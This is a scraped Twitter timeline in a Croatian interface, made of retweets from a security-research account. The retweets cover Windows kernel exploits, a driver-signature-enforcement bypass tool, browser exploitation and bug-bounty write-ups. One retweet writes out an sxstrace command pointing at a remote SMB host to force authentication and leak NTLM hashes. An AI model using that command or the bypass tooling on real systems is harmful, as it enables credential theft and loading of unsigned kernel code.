Tweetovi

Blokirali ste korisnika/cu @sickness416

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sickness416

  1. proslijedio/la je Tweet
    2. velj

    KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore,

    Poništi
  2. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    Poništi
  3. proslijedio/la je Tweet
    20. sij
    Poništi
  4. proslijedio/la je Tweet
    20. sij

    If you're into programming, hacking, retro computers, electronics, etc check out our free magazine: 💾 Issues #1 and #2 are already out! For Issue #3 we're looking for: - Articles and Art! - Free community ads! - And sponsorship ads! Deadline: 20.02.20

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    18. sij

    My first blog post on browser exploitation for . I'll look at how to pop xcalc on current Linux Spidermonkey given a relative (oob) rw bug. Spidermonkey is the JavaScript Engine in Firefox. Exploit code also supplied.

    Poništi
  6. proslijedio/la je Tweet
    18. sij

    Just finished writing my second windows kernel Practical Reverse Engineering solution: "Dumping DPC Queues: Adventures in HIGH_LEVEL IRQL" 🥳 Writing signatures for undocumented windows kernel stuff in HIGH_LEVEL IRQL sure is fun (BSODs are also fun)😎

    Poništi
  7. proslijedio/la je Tweet
    10. sij

    There are currently enough random tweets/blogs floating around here to toss together a working RCE exploit for the Citrix Netscaler vuln. You probably want to chase people around today making sure they apply the mitigation.

    Poništi
  8. proslijedio/la je Tweet
    9. sij

    Project Zero blog: "Remote‌ ‌iPhone‌ ‌Exploitation‌ ‌Part‌ ‌1:‌ ‌Poking‌ ‌Memory‌ ‌via‌ ‌iMessage‌ ‌and‌ ‌CVE-2019-8641‌" by Samuel Groß () --

    Poništi
  9. proslijedio/la je Tweet
    9. sij

    Windows api set resolution..

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    7. sij

    Full analysis and exploit for Windows kernel ws2ifsl use-after-free (CVE-2019-1215) by our researcher

    Poništi
  11. proslijedio/la je Tweet
    3. sij

    Here is an exploit for LPE CVE-2019-1184 in case anybody else is interested in this cool bug:

    Poništi
  12. proslijedio/la je Tweet
    30. pro 2019.
    Poništi
  13. proslijedio/la je Tweet
    28. pro 2019.
    Poništi
  14. proslijedio/la je Tweet
    27. pro 2019.

    Practical reverse engineering is an awesome book with insightful windows kernel exercises - I decided to complete all of the exercises and post complete write-ups to my solutions 😛🥳 Here's the first one: Reversing AuxKlibQueryModuleInformation

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    24. pro 2019.

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

    Poništi
  16. proslijedio/la je Tweet
    24. pro 2019.

    -2019-17571 Apache Log4j 1.2.x RCE via Socket Server Deserialization

    Poništi
  17. proslijedio/la je Tweet
    23. pro 2019.

    Got confirmation on passing today! Thanks to , , & for the AWEsome training 2019 :)

    Poništi
  18. proslijedio/la je Tweet
    21. pro 2019.

    New writeup, one of my favorite bugs 🤠 - Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty Featuring...

    Poništi
  19. proslijedio/la je Tweet

    In the final blog of our Top 5 bugs of 2019, details a privilege escalation via the core shell COM registrar object in .

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·